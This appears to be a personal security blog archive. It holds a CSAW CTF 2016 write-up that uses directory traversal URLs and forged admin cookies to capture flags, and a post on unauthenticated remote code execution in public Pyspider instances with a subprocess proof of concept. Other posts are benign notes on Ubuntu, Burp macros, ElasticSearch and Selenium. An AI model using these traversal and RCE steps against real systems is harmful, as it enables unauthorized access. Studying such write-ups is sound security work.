Tuesday, September 20, 2016

[Writeup] CSAW CTF 2016

mfw (125)
This main url:

Fuzz it to easy:

Play with flag

wtf.sh 1 (150)

Register one account, logined.
Create post, view post
Fuzzing now, i found directory traversal (WTF? traversal again)
When fuzz to: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess may be can read all file in this directoty, like cat * :)).

I found some interesting function (after use decoder to view beautifull code):

function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
# generate a random token, base64 encoded
# on GNU base64 wraps at 76 characters, so we need to pass --wrap=0
function generate_token {
    (head -c 64 | (base64 --wrap=0 || base64)) < /dev/urandom 2> /dev/null;

SHA username, password and generate random token. Ok
Next function

function find_user_file {
    local username=$1;
    local hashed=$(hash_username "${username}"); # My comment, admin shasum 4015bc9ee91e437d90df83fb64fbbe312d9c9f05/posts
    local f;
    if [[ -n "${username}" && -e "users_lookup/${hashed}" ]]
        echo "users/$(cat "users_lookup/${hashed}/userid")";
        echo "users/$(cat "users_lookup/4015bc9ee91e437d90df83fb64fbbe312d9c9f05/userid")";
        echo "NONE"; # our failure case -- ugly but w/e...
function create_user {
    local username=$1;
    local password=$2;
    local hashed_pass=$(hash_password ${password});
    local hashed_username=$(hash_username "${username}");
    local token=$(generate_token);
    mkdir users 2> /dev/null; # make sure users directory exists
    touch users/.nolist; # make sure that the users dir can't be listed
    touch users/.noread; # don't allow reading of user files directly
    mkdir users_lookup 2> /dev/null; # make sure the username -> userid lookup directory exists
    touch users_lookup/.nolist; # don't let it be listed
    local user_id=$(basename $(mktemp users/XXXXX));

    # user files look like:
    #   username
    #   hashed_pass
    #   token
    echo "${username}" > "users/${user_id}";
    echo "${hashed_pass}" >> "users/${user_id}";
    echo "${token}" >> "users/${user_id}";

    mkdir "users_lookup/${hashed_username}" 2> /dev/null;
    touch "users_lookup/${hashed_username}/.nolist"; # lookup dir for this user can't be readable
    touch "users_lookup/${hashed_username}/.noread"; # don't allow reading the lookup dir
    touch "users_lookup/${hashed_username}/posts"; # lookup for posts this user has participated in
    echo "${user_id}" > "users_lookup/${hashed_username}/userid"; # create reverse lookup
    echo ${user_id};


After create user, user had one random id, like 2KP1G (5 chars), username, hashed_pass, token stored in user/${user_id}.
Use Path traversal, we had admin token and hased password. Of course, i will not crackable =]]
URL: http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../../users

Posted by admin

Now, notice this function:
$ if contains 'user' ${!URL_PARAMS[@]} && file_exists "users/${URL_PARAMS['user']}"
$ then
$   local username=$(head -n 1 users/${URL_PARAMS['user']});
$   echo "

${username}'s posts:

$   echo "
    $   get_users_posts "${username}" | while read -r post; do
    $       post_slug=$(awk -F/ '{print $2 "#" $3}' <<< "${post}");
    $       echo "
  1. $(nth_line 2 "${post}" | htmlentities)
  2. ";
    $   done
    $   echo "
$   if is_logged_in && [[ "${COOKIES['USERNAME']}" = 'admin' ]] && [[ ${username} = 'admin' ]]
$   then
$       get_flag1
$   fi
$ fi

Oh, don`t need admin password, we need a cookie admin (easy), and admin is_logged_in. Find that function:
function is_logged_in {
    contains 'TOKEN' ${!COOKIES[@]} && contains 'USERNAME' ${!COOKIES[@]};
    local has_cookies=$?
    local userfile=$(find_user_file ${COOKIES['USERNAME']});
    [[ ${has_cookies} \
        && ${userfile} != 'NONE' \
        && $(tail -n1 ${userfile} 2>/dev/null) = ${COOKIES['TOKEN']} \
        && $(head -n1 ${userfile} 2>/dev/null) = ${COOKIES['USERNAME']} \
    return $?;
Cookie is token. Now, we had admin token. Change token and user name to admin. Refesh and go to profile:

Flag: flag{l00k_at_m3_I_am_th3_4dm1n_n0w}

I Got Id (200)
Thanks to Acunetix :)).
After scan, i have this bug:

I tried to many file path, but it too easy :|

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Tuesday, September 6, 2016

RCE in Pyspider

Today i read one articles about exploit debug mode in Werkzeug. It old, but very interesting. When i try to find website in shodan, i found 30s website use pyspider. Pyspider is python opensource, you can download and install it from: https://github.com/binux/pyspider
It had one problem, it not authentication. Anyone can access.

When click to one process, you can go to debug mode. And you can edit python code. So, you can use it to run code execute. It is RCE.

This is my POC:
       import subprocess
        p = subprocess.Popen(["id","-m"], stdout=subprocess.PIPE)
        output, err = p.communicate()

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Monday, August 15, 2016

Install Skype and Facebook Message Plugin for Ubuntu

In windows, easy to install Facebook App, Skype App. But on Ubuntu, i need one app for 2 services. So i choose pidgin.
1. Install Facebook plugin:
We use purple-facebook:
sudo sh -c "echo 'deb http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/ /' >> /etc/apt/sources.list.d/jgeboski.list"
cd /tmp && wget  http://download.opensuse.org/repositories/home:/jgeboski/xUbuntu_$(lsb_release -rs)/Release.key
sudo apt-key add - < Release.key
sudo apt-get update
sudo apt-get install purple-facebook
Add your facebook account in Manager Account.
2. Install Skype plugin:
We use skypeweb:
sudo apt-get install libpurple-dev libjson-glib-dev cmake gcc
git clone git://github.com/EionRobb/skype4pidgin.git
cd skype4pidgin/skypeweb
mkdir build
cd build
cmake ..
sudo dpkg -i skypeweb-1.1.0-Linux.deb

Add your skype account in Manager Account.

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Saturday, July 23, 2016

Use marco to Anti-CSRF token in Burpsuite

When i am reading one paper about Burpsuite trick, this talk about: Burpsuite marco, and we can use it to anti-csrf token.
I tried it with this demo: http://www.businessinfo.co.uk/labs/csrf_defend/form_token_demo_stage2.php
First request to get token in htlm (formtoken), and post request (request 2) use it to check.
Now, we need use marco to automatic get token, add to post data.
Make sure 2 request and response in http proxy, and intercept is off
Go to project options (version > 1.7) or options (<=1.6, i not sure). I used pro version. Chose Session tab. In session handing rules, add new rule:
Type your rule name, like Anti CSRF Rule for xx.com. In rule action, choose Add, with "run post-request marco" type. You can see Action handing editor.

Add new marcos by click add, new marco editor and marco recorder windows open

Now, in marco recorder you must choose 2 request. request 1 is request get token, and request 2 is action request use token (choose by select it). 

Click OK, 2 request will be send to Marco Editor:

You can re-order 2 request, before request is top (number 1), and after request is bottom (number 2). In many case, burpsuite can auto analyze to extract parameter. We can manual extract by use: Configure item.
Click request 1, and click Configure item. In config marco item for.... click add. Now we can instructor for burpsuite extract exactly value in html code. And we can assign name for it (form_token):

Click ok, and go to, we can see form_token in custom parameter. Click Ok to return Marco editor. 
Select request 2, and click configure item. In parameter handling, formtoken select Deriver from pior response, and select response 1
Ok to return Marco editor. You can test marco. Ok to return Session handling editor. you can select: Update only following parameter, and choose your parameter.
Make sure click on the final request in marco. Click OK to return Session handling rule editor
Click to scope tab, make sure click on Tool scope you need (Extender, Intruder, Repeater ...). In url scope you can click on all url, or enter specific url

Ok to return Project option, we can see new Session handling rule and maro
Now you can use this macro in your tool. To monitor, debug it you can open session trace. 

You can use it for intruder (run your payload), or repeater.
But it is marco only, so you can only select in prior response. If need extract, and need calculate bla bla, this trick can not used. I think we need program new extender to solve it
Note: If you need run marco before run main request (like login), you must choose "Run marco" when add rule action.

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Monday, June 27, 2016

Automount partition in Ubuntu with fstab

Before use Ubuntu, i installed windows OS. I had 2 partitions in nfts, its not auto mount, only mount when i click in local disk icon.
So i need auto load it, to run many application in this partitions.
First, i need find ssid of partition in: /dev/disk/by-uuid.
Then, edit /etc/fstab. Add:
 UUID=327E4E257E4DE1E9 /mnt/sdb1/ ntfs   rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000 0 0
UUID=38D822D9D82294E2   /mnt/sdb2/      ntfs    rw,auto,users,exec,nls=utf8,umask=003,gid=46,uid=1000   0       0

Whit UUID i founded, and uid is id of my user.
To add this location to menu bar, use "Bookmark this location" of Gnome.

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Friday, June 24, 2016

Some experience while working with ElasticSearch, Angular

In this week, i join one project need program web portal. My hobby is Python so i chose Flask, Angular JS. I`m using bootstrap to make css template.
My DB is ElasticSearch. I don`t use http request to make query ES, i used python-es lib.
So, when use ES, i have some problems.
1. Sort in ES:
            data = self.es.search(index=self.indexName, doc_type=self.docType,
                                  body={"query": {
                                      "filtered": {
                                          "query": {
                                              "bool": {
                                                  "must": mustDict,
                                      "size": size, "from": from_, "sort": {"timestamp":{"order":"desc"}}
2. AND/OR operator: use bool.
AND like must. I created must list.
3. To make Restful API, i used flask_restful and integrated with my flask. Coding like web MVC. Blueprint to route and create controller, then render HTML. In client, call restful api to get data. Very simple.
4. Angular JS re-render:
I used start-angular theme, and it have table responsive. All data in
tag. And it will be filled by Angular JS. But table responsive must render after Angular render. So i found one trick use directive and setTimeout:

    function reFormatTable() {
            responsive: true
    var app = angular.module('myApp', [])
            .directive('myRepeatDirective', function () {
                return function (scope, element, attrs) {
            }).directive('myMainDirective', function () {
                return function (scope, element, attrs) {
                    setTimeout(reFormatTable, 1000);
5. Call angular function in template:
I like program in angular template, so i need angular function. To map:
        $scope.isObject = angular.isObject;
        $scope.isString = angular.isString;
        $scope.isDefined = angular.isDefined;
In HTML: ng-if = "isObject(object)"
6. Find string in field:
When searching, i need find string in one field. I tried with regex, * character but not success. Finally, i found wildcard:
mustDict.append({"wildcard" : { "site" : { "value" : "*{0}*".format(sitename), "boost" : 2.0 }}})
Search in site field, with value have string sitename. I added to mustDict.
Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Monday, June 6, 2016

Popup interactive in Selenimum

When develop AWATT tool, i got this problem: after click, pop up alert windows show and must confirm (accept, dismiss) to continue.
You can not use selector of selenium to control it. This is  solution:

from selenium import webdriver
import time
url = "http://www.javascripter.net/faq/alert.htm"
driver = webdriver.Firefox()
element = driver.find_element_by_xpath("//input[@type='button']")
alert = driver.switch_to_alert()
# alert.dismiss()

Thanks for reading
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.